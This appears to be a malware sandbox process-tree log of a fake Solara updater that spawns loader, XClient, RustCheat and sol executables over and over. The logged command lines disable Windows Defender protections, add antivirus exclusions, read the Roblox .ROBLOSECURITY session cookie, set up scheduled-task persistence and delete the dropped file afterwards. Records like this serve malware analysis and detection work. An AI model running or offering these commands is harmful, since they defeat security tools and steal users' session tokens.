C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:1632
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svhost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:2812
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\Admin\AppData\Roaming\svhost.exe"4⤵
- Creates scheduled task(s)
PID:2256
-
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:276 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"4⤵
- Views/modifies file attributes
PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2516
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵PID:2516
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵PID:2648
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
PID:2564
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause4⤵PID:448
-
C:\Windows\system32\PING.EXEping localhost5⤵
- Runs ping.exe
PID:1140
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"3⤵PID:2828
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "4⤵
- Loads dropped DLL
PID:2100 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f4mf1g3z\f4mf1g3z.cmdline"6⤵
- Drops file in System32 directory
PID:2880 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E99.tmp" "c:\Windows\System32\CSC2FEC2B28D6C643E49C6489917F1F18A0.TMP"7⤵PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Sybwy7Zv6j.bat"6⤵PID:2152
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:2964
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:996
-
-
C:\Program Files\Windows Mail\en-US\sppsvc.exe"C:\Program Files\Windows Mail\en-US\sppsvc.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:760
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"3⤵
- Executes dropped EXE
PID:2604
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"4⤵PID:1348
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "5⤵
- Loads dropped DLL
PID:2928 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2584
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"5⤵
- Executes dropped EXE
PID:2096
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"5⤵PID:1624
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "6⤵
- Loads dropped DLL
PID:2600 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"7⤵
- Executes dropped EXE
PID:1852
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"5⤵
- Executes dropped EXE
PID:2316
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"6⤵PID:536
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "7⤵
- Loads dropped DLL
PID:1212 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"8⤵
- Executes dropped EXE
PID:2440
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"5⤵PID:2856
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"6⤵
- Executes dropped EXE
PID:2528
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"6⤵
- Executes dropped EXE
PID:1528 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"7⤵PID:2536
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "8⤵
- Loads dropped DLL
PID:1228 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"9⤵
- Executes dropped EXE
PID:2836
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"6⤵PID:448
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"7⤵
- Executes dropped EXE
PID:948
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"7⤵
- Executes dropped EXE
PID:3040 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"8⤵PID:2364
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "9⤵
- Loads dropped DLL
PID:2816 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"10⤵
- Executes dropped EXE
PID:2156
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"7⤵PID:1792
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"8⤵
- Executes dropped EXE
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"8⤵
- Executes dropped EXE
PID:2812 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"9⤵PID:1776
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "10⤵
- Loads dropped DLL
PID:2116 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"11⤵
- Executes dropped EXE
PID:1976
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"8⤵PID:2416
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"9⤵
- Executes dropped EXE
PID:2596
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"9⤵
- Executes dropped EXE
PID:2992 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"10⤵PID:2692
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "11⤵
- Loads dropped DLL
PID:2196 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"12⤵
- Executes dropped EXE
PID:2980
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"9⤵PID:2672
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"10⤵
- Executes dropped EXE
PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"10⤵
- Executes dropped EXE
PID:1152 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"11⤵PID:2392
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "12⤵
- Loads dropped DLL
PID:1940 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"13⤵
- Executes dropped EXE
PID:1444
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"10⤵PID:2912
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"11⤵
- Executes dropped EXE
PID:2696
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"11⤵
- Executes dropped EXE
PID:1664 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"12⤵PID:1964
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "13⤵
- Loads dropped DLL
PID:768 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"14⤵
- Executes dropped EXE
PID:2552
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"11⤵PID:2484
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"12⤵
- Executes dropped EXE
PID:2496
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"12⤵
- Executes dropped EXE
PID:288 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"13⤵PID:1784
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "14⤵
- Loads dropped DLL
PID:1912 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"15⤵
- Executes dropped EXE
PID:3040
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"12⤵PID:1524
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"13⤵
- Executes dropped EXE
PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"13⤵
- Executes dropped EXE
PID:332 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"14⤵PID:2432
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "15⤵
- Loads dropped DLL
PID:2580 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"16⤵PID:1556
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"13⤵PID:1860
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"14⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"15⤵
- Executes dropped EXE
PID:1148
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"15⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2660 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid16⤵PID:1284
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"16⤵
- Views/modifies file attributes
PID:836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'16⤵
- Command and Scripting Interpreter: PowerShell
PID:1624
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 216⤵PID:1444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY16⤵PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY16⤵PID:2644
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption16⤵PID:2508
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory16⤵PID:540
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid16⤵PID:1376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER16⤵PID:2952
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name16⤵
- Detects videocard installed
PID:2580
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe" && pause16⤵PID:2016
-
C:\Windows\system32\PING.EXEping localhost17⤵
- Runs ping.exe
PID:2940
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"14⤵
- Executes dropped EXE
PID:2812 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"15⤵PID:2664
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "16⤵
- Loads dropped DLL
PID:3060 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"17⤵PID:2364
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"14⤵PID:1736
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"15⤵
- Executes dropped EXE
PID:1864
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"15⤵
- Executes dropped EXE
PID:796 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"16⤵PID:764
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "17⤵
- Loads dropped DLL
PID:1116 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"18⤵PID:484
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"15⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"16⤵
- Executes dropped EXE
PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"16⤵
- Executes dropped EXE
PID:496 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"17⤵PID:2656
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "18⤵
- Loads dropped DLL
PID:2480 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"19⤵PID:2264
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"16⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"17⤵
- Executes dropped EXE
PID:1612
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"17⤵
- Executes dropped EXE
PID:1152 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"18⤵PID:856
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "19⤵
- Loads dropped DLL
PID:2152 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"20⤵PID:2160
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"17⤵PID:628
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"18⤵
- Executes dropped EXE
PID:2564
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"18⤵
- Executes dropped EXE
PID:1660 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"19⤵PID:1620
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "20⤵
- Loads dropped DLL
PID:2696 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"21⤵PID:2708
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"18⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"19⤵
- Executes dropped EXE
PID:948
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"19⤵
- Executes dropped EXE
PID:1536 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"20⤵PID:1596
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "21⤵
- Loads dropped DLL
PID:668 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"22⤵PID:1660
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"19⤵PID:2416
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"20⤵
- Executes dropped EXE
PID:1476
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"20⤵
- Executes dropped EXE
PID:876 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"21⤵PID:2136
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "22⤵
- Loads dropped DLL
PID:2752 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"23⤵PID:2932
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"20⤵PID:1680
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"21⤵
- Executes dropped EXE
PID:1752
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"21⤵
- Executes dropped EXE
PID:2912 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"22⤵PID:296
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "23⤵
- Loads dropped DLL
PID:2336 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"24⤵PID:2432
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"21⤵PID:2788
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"22⤵
- Executes dropped EXE
PID:1660
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"22⤵
- Executes dropped EXE
PID:2308 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"23⤵PID:2472
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "24⤵
- Loads dropped DLL
PID:884 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"25⤵PID:572
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"22⤵PID:1452
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"23⤵
- Executes dropped EXE
PID:2284
-
-
